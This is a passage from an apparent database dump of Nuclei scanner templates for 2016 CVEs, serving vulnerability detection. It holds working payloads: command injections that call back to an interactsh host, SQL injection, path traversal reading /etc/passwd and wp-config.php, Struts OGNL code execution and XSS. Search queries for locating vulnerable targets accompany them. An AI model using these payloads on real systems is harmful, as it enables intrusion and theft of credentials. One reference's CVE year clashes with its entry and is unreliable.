CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2016-10108\n cwe-id: CWE-77\n epss-score: 0.86242\n epss-percentile: 0.98335\n cpe: cpe:2.3:a:western_digital:mycloud_nas:2.11.142:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: western_digital\n product: mycloud_nas\n shodan-query: http.favicon.hash:-1074357885\n tags: cve2016,cve,packetstorm,rce,oast,wdcloud,western_digital\n\nhttp:\n - raw:\n - |\n GET / HTTP/1.1\n Host: {{Hostname}}\n Cookie: isAdmin=1; username=admin|echo%20`ping -c 3 {{interactsh-url}}`; local_login=1\n\n matchers:\n - type: dsl\n dsl:\n - contains(body, \"WDMyCloud\")\n - contains(interactsh_protocol, \"dns\")\n - status_code == 200\n condition: and\n# digest: 4a0a00473045022009c2486f30becc2499ca04c5fd0ac65f865b151e080af9af519b44a6d8dd42db022100b5c4bd69f88ec99e269d3b35db9eabdcffed4cb8a89aea1aa13bc5576b8349f3:922c64590222798bb761d5b6d8e72950", "hash": "4b863c6bebd101dd8742067ec95c3ee9", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f8e" }, "name": "CVE-2016-10134.yaml", "content": "id: CVE-2016-10134\n\ninfo:\n name: Zabbix - SQL Injection\n author: princechaddha\n severity: critical\n description: Zabbix before 2.2.14 and 3.0 before 3.0.4 allows remote attackers to execute arbitrary SQL commands via the toggle_ids array parameter in latest.php and perform SQL injection attacks.\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the Zabbix application and underlying systems.\n remediation: |\n Apply the latest security patches or upgrade to a patched version of Zabbix to mitigate the SQL Injection vulnerability (CVE-2016-10134).\n reference:\n - https://github.com/vulhub/vulhub/tree/master/zabbix/CVE-2016-10134\n - https://nvd.nist.gov/vuln/detail/CVE-2016-10134\n - https://support.zabbix.com/browse/ZBX-11023\n - https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=850936\n - http://www.debian.org/security/2017/dsa-3802\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2016-10134\n cwe-id: CWE-89\n epss-score: 0.05366\n epss-percentile: 0.92931\n cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: zabbix\n product: zabbix\n tags: cve2016,cve,zabbix,sqli,vulhub\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)::\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'Error in query [INSERT INTO profiles (profileid, userid'\n - 'You have an error in your SQL syntax'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022002af95be90d34c083687132956f3fddac7b02d6c5bde40cad1957ff829e41a4b022100bec226073019d0c0c6a39cd446db71450cea262f0ed5a9b880e9b6c6fb46f340:922c64590222798bb761d5b6d8e72950", "hash": "067f7d8ff9251eee0af3b34878488ee7", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f8f" }, "name": "CVE-2016-10367.yaml", "content": "id: CVE-2016-10367\n\ninfo:\n name: Opsview Monitor Pro - Local File Inclusion\n author: 0x_akoko\n severity: high\n description: Opsview Monitor Pro prior to 5.1.0.162300841, prior to 5.0.2.27475, prior to 4.6.4.162391051, and 4.5.x without a certain 2016 security patch is vulnerable to unauthenticated local file inclusion and can be exploited by issuing a specially crafted HTTP GET request utilizing a simple bypass.\n impact: |\n An attacker can read sensitive files on the server, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Upgrade to the latest version of Opsview Monitor Pro to fix the local file inclusion vulnerability.\n reference:\n - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18774\n - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341\n - https://nvd.nist.gov/vuln/detail/CVE-2016-10367\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2016-10367\n cwe-id: CWE-22\n epss-score: 0.00521\n epss-percentile: 0.76355\n cpe: cpe:2.3:a:opsview:opsview:4.5.0:*:*:*:pro:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: opsview\n product: opsview\n shodan-query: title:\"Opsview\"\n tags: cve2016,cve,opsview,lfi\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/monitoring/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 404\n# digest: 4b0a00483046022100e45cbb5ec1e7ce9a8197b7f9cbdc7f7bfb9d89d7e983f6768c0c94b05fd91dd1022100e883d7b49b27776141743b2d5eb0b5ab4e18468dce7bf589f9a2a0b02ad0b090:922c64590222798bb761d5b6d8e72950", "hash": "caafd7308ceaf18695f0f576b66416fe", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f90" }, "name": "CVE-2016-10368.yaml", "content": "id: CVE-2016-10368\n\ninfo:\n name: Opsview Monitor Pro - Open Redirect\n author: 0x_Akoko\n severity: medium\n description: |\n Opsview Monitor Pro before 5.1.0.162300841, before 5.0.2.27475, before 4.6.4.162391051, and 4.5.x without a certain 2016 security patch contains an open redirect vulnerability. An attacker can redirect users to arbitrary web sites and conduct phishing attacks via the back parameter to the login URI.\n impact: |\n An attacker can redirect users to malicious websites, leading to phishing attacks or the download of malware.\n remediation: |\n Apply the latest patch or upgrade to a version that is not affected by the vulnerability.\n reference:\n - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18774\n - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341\n - https://nvd.nist.gov/vuln/detail/CVE-2016-10368\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-10368\n cwe-id: CWE-601\n epss-score: 0.00204\n epss-percentile: 0.57743\n cpe: cpe:2.3:a:opsview:opsview:4.5.0:*:*:*:pro:*:*:*\n metadata:\n max-request: 1\n vendor: opsview\n product: opsview\n tags: cve2016,cve,redirect,opsview,authenticated\n\nhttp:\n - raw:\n - |\n POST /login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n login_username={{username}}&login_password={{password}}&login=&back=//www.interact.sh&app=OPSVIEW\n\n matchers-condition: and\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n\n - type: status\n status:\n - 302\n# digest: 490a0046304402205efe425e5d9b18e4d0fbbc16efa3c8463f7588294009126f1ce333acc1f041de0220194d5a323c78df75dd1216016dc142581916068c79129fc2159ea61553b623b5:922c64590222798bb761d5b6d8e72950", "hash": "19ac1555026160ec6d71a40161b76402", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f91" }, "name": "CVE-2016-10924.yaml", "content": "id: CVE-2016-10924\n\ninfo:\n name: Wordpress Zedna eBook download <1.2 - Local File Inclusion\n author: idealphase\n severity: high\n description: |\n Wordpress Zedna eBook download prior to version 1.2 was affected by a filedownload.php local file inclusion vulnerability.\n impact: |\n An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to sensitive information disclosure or remote code execution.\n remediation: |\n Update to the latest version of the plugin to fix the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/13d5d17a-00a8-441e-bda1-2fd2b4158a6c\n - https://www.exploit-db.com/exploits/39575\n - https://nvd.nist.gov/vuln/detail/CVE-2016-10924\n - https://wordpress.org/plugins/ebook-download/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2016-10924\n cwe-id: CWE-22\n epss-score: 0.01429\n epss-percentile: 0.85146\n cpe: cpe:2.3:a:zedna_ebook_download_project:zedna_ebook_download:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: zedna_ebook_download_project\n product: zedna_ebook_download\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/ebook-download\"\n tags: cve2016,cve,wordpress,edb,wp-plugin,lfi,ebook,wp,wpscan,zedna_ebook_download_project\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"DB_NAME\"\n - \"DB_PASSWORD\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022035463ec47dab2e9697b6674a8af15173fe0695e388c6704ee510f3d410ef89e8022100ad37ebb93323af593940c5eece752836b5f4ca33475290dcf8601e11cfe00fd8:922c64590222798bb761d5b6d8e72950", "hash": "c851b94659e5e512087c3e366cbc8c4b", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f92" }, "name": "CVE-2016-10940.yaml", "content": "id: CVE-2016-10940\n\ninfo:\n name: WordPress zm-gallery plugin 1.0 SQL Injection\n author: cckuailong,daffainfo\n severity: high\n description: zm-gallery plugin 1.0 for WordPress is susceptible to SQL injection via the order parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Update to the latest version of the zm-gallery plugin or apply the patch provided by the vendor.\n reference:\n - https://wpscan.com/vulnerability/c0cbd314-0f4f-47db-911d-9b2e974bd0f6\n - https://lenonleite.com.br/en/2016/12/16/zm-gallery-1-plugin-wordpress-blind-injection/\n - https://nvd.nist.gov/vuln/detail/CVE-2016-10940\n - http://lenonleite.com.br/en/2016/12/16/zm-gallery-1-plugin-wordpress-blind-injection/\n - https://wordpress.org/plugins/zm-gallery/#developers\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2016-10940\n cwe-id: CWE-89\n epss-score: 0.00776\n epss-percentile: 0.80947\n cpe: cpe:2.3:a:zm-gallery_project:zm-gallery:1.0:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 3\n vendor: zm-gallery_project\n product: zm-gallery\n framework: wordpress\n tags: cve,cve2016,wpscan,sqli,wp,wordpress,wp-plugin,authenticated,zm-gallery_project\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7422)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_1 == 302 && status_code_2 == 200 && status_code_3 == 200'\n - 'contains(body_2, \"[zm_gallery id=\")'\n - 'contains(body_2, \"\")'\n - '!contains(body_3, \"\")'\n condition: and\n# digest: 490a004630440220699b403999a44dfa1c0a95c442149578cb0dba8769c29aff63008cc829004d2202201090107521d760927c5f1134bbceda7facb495a7c6291a6a0669d3ca7a6832ef:922c64590222798bb761d5b6d8e72950", "hash": "bfed77c7874857656809735fa1029221", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f93" }, "name": "CVE-2016-10956.yaml", "content": "id: CVE-2016-10956\n\ninfo:\n name: WordPress Mail Masta 1.0 - Local File Inclusion\n author: daffainfo,0x240x23elu\n severity: high\n description: WordPress Mail Masta 1.0 is susceptible to local file inclusion in count_of_send.php and csvexport.php.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Update WordPress Mail Masta to the latest version or apply the vendor-supplied patch to fix the local file inclusion vulnerability.\n reference:\n - https://cxsecurity.com/issue/WLB-2016080220\n - https://wpvulndb.com/vulnerabilities/8609\n - https://wordpress.org/plugins/mail-masta/#developers\n - https://nvd.nist.gov/vuln/detail/CVE-2016-10956\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2016-10956\n cwe-id: CWE-20\n epss-score: 0.01238\n epss-percentile: 0.83962\n cpe: cpe:2.3:a:mail-masta_project:mail-masta:1.0:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: mail-masta_project\n product: mail-masta\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/mail-masta\"\n tags: cve,cve2016,wordpress,wp-plugin,lfi,mail,mail-masta_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd\"\n - \"{{BaseURL}}/wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n - 500\n# digest: 490a00463044022039d06d4aa7a538325a7def0732a690e76353bd439cec6d8585bccf59a180048002205b9232ef9dbcf11df674e2c295d9a64257cd54d42501c853019ff131e47e7741:922c64590222798bb761d5b6d8e72950", "hash": "23b85dc135ddc82ea89b0342c5c760cf", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f94" }, "name": "CVE-2016-10960.yaml", "content": "id: CVE-2016-10960\n\ninfo:\n name: WordPress wSecure Lite < 2.4 - Remote Code Execution\n author: daffainfo\n severity: high\n description: WordPress wsecure plugin before 2.4 is susceptible to remote code execution via shell metacharacters in the wsecure-config.php publish parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected WordPress site.\n remediation: |\n Update to the latest version of WordPress wSecure Lite plugin (2.4 or higher) to fix the vulnerability.\n reference:\n - https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/\n - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960\n - https://wordpress.org/plugins/wsecure/#developers\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2016-10960\n cwe-id: CWE-20\n epss-score: 0.01469\n epss-percentile: 0.86457\n cpe: cpe:2.3:a:joomlaserviceprovider:wsecure:*:*:*:*:lite:wordpress:*:*\n metadata:\n max-request: 1\n vendor: joomlaserviceprovider\n product: wsecure\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/wsecure\"\n tags: cve2016,cve,wordpress,wp-plugin,rce,joomlaserviceprovider\nvariables:\n name: \"{{to_lower(rand_text_alpha(5))}}\"\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php\"\n\n body: 'wsecure_action=update&publish=\";} header(\"{{name}}: CVE-2016-10960\"); class WSecureConfig2 {var $test=\"'\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"{{name}}: CVE-2016-10960\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022028547f88cd5ee6349b8fce17ed0c1ebb51aaccf87c6ebb245512f16a9b0976f2022100a8c2ef6ffcfe5bd3d42a7330cbf6d03b61b9ff919f463b7838a8db77a1502946:922c64590222798bb761d5b6d8e72950", "hash": "1351ea75baa9b07c3d2b47b9315a6148", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f95" }, "name": "CVE-2016-10973.yaml", "content": "id: CVE-2016-10973\n\ninfo:\n name: Brafton WordPress Plugin < 3.4.8 - Cross-Site Scripting\n author: Harsh\n severity: medium\n description: |\n The Brafton plugin before 3.4.8 for WordPress has XSS via the wp-admin/admin.php?page=BraftonArticleLoader tab parameter to BraftonAdminPage.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Upgrade to the latest version of the Brafton WordPress Plugin (version 3.4.9 or higher) to mitigate this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/93568433-0b63-4ea7-bbac-4323d3ee0abd\n - https://nvd.nist.gov/vuln/detail/CVE-2026-10973\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-10973\n cwe-id: CWE-79\n epss-score: 0.00177\n epss-percentile: 0.54991\n cpe: cpe:2.3:a:brafton:brafton:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: brafton\n product: brafton\n framework: wordpress\n tags: cve2016,cve,wpscan,wordpress,wp,wp-plugin,xss,brafton,authenticated\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=BraftonArticleLoader&tab=alert%28document.domain%29 HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(content_type_2, \"text/html\")'\n - 'contains(body_2, \"tab = alert(document.domain);\")'\n - 'contains(body_2, \"Brafton Article Loader\")'\n condition: and\n# digest: 490a004630440220056398545c7971a832b6a0a6562ed13c279b426e0b8783134e5536c67d1a589d0220409848bc2ce496563f76afcdeb4851709c338b118dba11b50c81cefc0a171f67:922c64590222798bb761d5b6d8e72950", "hash": "d58dedd5515a600947037040b2c607cd", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f96" }, "name": "CVE-2016-10993.yaml", "content": "id: CVE-2016-10993\n\ninfo:\n name: ScoreMe Theme - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: |\n WordPress ScoreMe theme through 2016-04-01 contains a reflected cross-site scripting vulnerability via the s parameter which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patch or update to the ScoreMe Theme to fix the XSS vulnerability.\n reference:\n - https://www.vulnerability-lab.com/get_content.php?id=1808\n - https://wpvulndb.com/vulnerabilities/8431\n - https://nvd.nist.gov/vuln/detail/CVE-2016-10993\n - https://github.com/0xkucing/CVE-2016-10993\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2016-10993\n cwe-id: CWE-79\n epss-score: 0.00245\n epss-percentile: 0.62591\n cpe: cpe:2.3:a:scoreme_project:scoreme:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: scoreme_project\n product: scoreme\n framework: wordpress\n tags: cve2016,cve,wordpress,wp-theme,xss,scoreme_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET / HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - '/wp-content/themes/scoreme/style'\n\n - method: GET\n path:\n - \"{{BaseURL}}/?s=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402205a861ba8febc9300fb6d1aa1ed02ef760e621783766ea29d336f8ac3dd2e10e2022035d451e147d56cdaf09231f43635e84b6263c7e74ec48c0fa59272f97264a0a2:922c64590222798bb761d5b6d8e72950", "hash": "de3266558eba3ffdc0d197a2b151e20c", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f97" }, "name": "CVE-2016-1555.yaml", "content": "id: CVE-2016-1555\n\ninfo:\n name: NETGEAR WNAP320 Access Point Firmware - Remote Command Injection\n author: gy741\n severity: critical\n description: NETGEAR WNAP320 Access Point Firmware version 2.0.3 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected device.\n remediation: |\n Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability.\n reference:\n - https://github.com/nobodyatall648/Netgear-WNAP320-Firmware-Version-2.0.3-RCE\n - https://nvd.nist.gov/vuln/detail/CVE-2016-1555\n - https://kb.netgear.com/30480/CVE-2016-1555-Notification?cid=wmt_netgear_organic\n - http://seclists.org/fulldisclosure/2016/Feb/112\n - http://packetstormsecurity.com/files/135956/D-Link-Netgear-FIRMADYNE-Command-Injection-Buffer-Overflow.html\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2016-1555\n cwe-id: CWE-77\n epss-score: 0.97373\n epss-percentile: 0.99898\n cpe: cpe:2.3:o:netgear:wnap320_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: netgear\n product: wnap320_firmware\n tags: cve2016,cve,seclists,packetstorm,netgear,rce,oast,router,kev\n\nhttp:\n - raw:\n - |\n POST /boardDataWW.php HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Content-Type: application/x-www-form-urlencoded\n\n macAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23®info=0&writeData=Submit\n\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n# digest: 4a0a0047304502202a0af6f4b5b74c37d86cf262d279ecf9a06914ec33fb6e7db00c710f0982ce60022100c68322772ed60b940af582741ea7d2816782e2641a7d654e563aa82ab3aedf98:922c64590222798bb761d5b6d8e72950", "hash": "e47ffd4c13e7dd83df318ecde3a3cbec", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f98" }, "name": "CVE-2016-2389.yaml", "content": "id: CVE-2016-2389\n\ninfo:\n name: SAP xMII 15.0 for SAP NetWeaver 7.4 - Local File Inclusion\n author: daffainfo\n severity: high\n description: SAP xMII 15.0 for SAP NetWeaver 7.4 is susceptible to a local file inclusion vulnerability in the GetFileList function. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the path parameter to /Catalog, aka SAP Security Note 2230978.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.\n remediation: |\n Apply the latest security patches and updates provided by SAP to mitigate the vulnerability.\n reference:\n - https://web.archive.org/web/20211209003818/https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/\n - http://packetstormsecurity.com/files/137046/SAP-MII-15.0-Directory-Traversal.html\n - https://www.exploit-db.com/exploits/39837/\n - https://nvd.nist.gov/vuln/detail/CVE-2016-2389\n - http://seclists.org/fulldisclosure/2016/May/40\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2016-2389\n cwe-id: CWE-22\n epss-score: 0.24589\n epss-percentile: 0.96217\n cpe: cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: sap\n product: netweaver\n shodan-query: http.favicon.hash:-266008933\n tags: cve2016,cve,packetstorm,seclists,lfi,sap,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100c0981ae3808610bcc8a7e8ab312d25bcf72ea0bb9e117d81d415d2632ad6ad3e022100e803bbfa6008004d6a0443f4c9e37201bf5b214ac7106ebdd2b96672c45ea5df:922c64590222798bb761d5b6d8e72950", "hash": "9181d00d811e6844095ad5ec912e2d88", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f99" }, "name": "CVE-2016-3081.yaml", "content": "id: CVE-2016-3081\n\ninfo:\n name: Apache S2-032 Struts - Remote Code Execution\n author: dhiyaneshDK\n severity: high\n description: |\n Apache Struts 2.3.19 to 2.3.20.2, 2.3.21 to 2.3.24.1, and 2.3.25 to 2.3.28, when dynamic method invocation is enabled, allows remote attackers to execute arbitrary code via method: prefix (related to chained expressions).\n impact: |\n Remote code execution\n remediation: |\n Upgrade to Apache Struts version 2.3.20.2, 2.3.24.2, or 2.3.28.1.\n reference:\n - https://cwiki.apache.org/confluence/display/WW/S2-032\n - https://struts.apache.org/docs/s2-032.html\n - https://nvd.nist.gov/vuln/detail/CVE-2016-3081\n - http://web.archive.org/web/20211207042547/https://securitytracker.com/id/1035665\n - http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20160527-01-struts2-en\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.1\n cve-id: CVE-2016-3081\n cwe-id: CWE-77\n epss-score: 0.97524\n epss-percentile: 0.99989\n cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: struts\n tags: cve2016,cve,struts,rce,apache\n\nhttp:\n - raw:\n - |\n GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100ac77a59d24373f8a33371c90c7e4275bd9cbd672278167a927b6b04d2066a1c4022100dc07b95c4a8afd4591d4fb49d9ac62d4cb34ac923b85398daa0a4e82aad7710d:922c64590222798bb761d5b6d8e72950", "hash": "4d18d45e398bfa1cf7a23fe5e7eff2a4", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f9a" }, "name": "CVE-2016-3088.yaml", "content": "id: CVE-2016-3088\n\ninfo:\n name: Apache ActiveMQ Fileserver - Arbitrary File Write\n author: fq_hsu\n severity: critical\n description: Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request via the Fileserver web application.\n impact: |\n An attacker can write arbitrary files on the server, potentially leading to remote code execution.\n remediation: |\n Upgrade to Apache ActiveMQ version 5.14.0 or later to fix the vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/40857\n - https://medium.com/@knownsec404team/analysis-of-apache-activemq-remote-code-execution-vulnerability-cve-2016-3088-575f80924f30\n - http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt\n - https://nvd.nist.gov/vuln/detail/CVE-2016-3088\n - http://rhn.redhat.com/errata/RHSA-2016-2036.html\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2016-3088\n cwe-id: CWE-20\n epss-score: 0.83955\n epss-percentile: 0.98392\n cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: 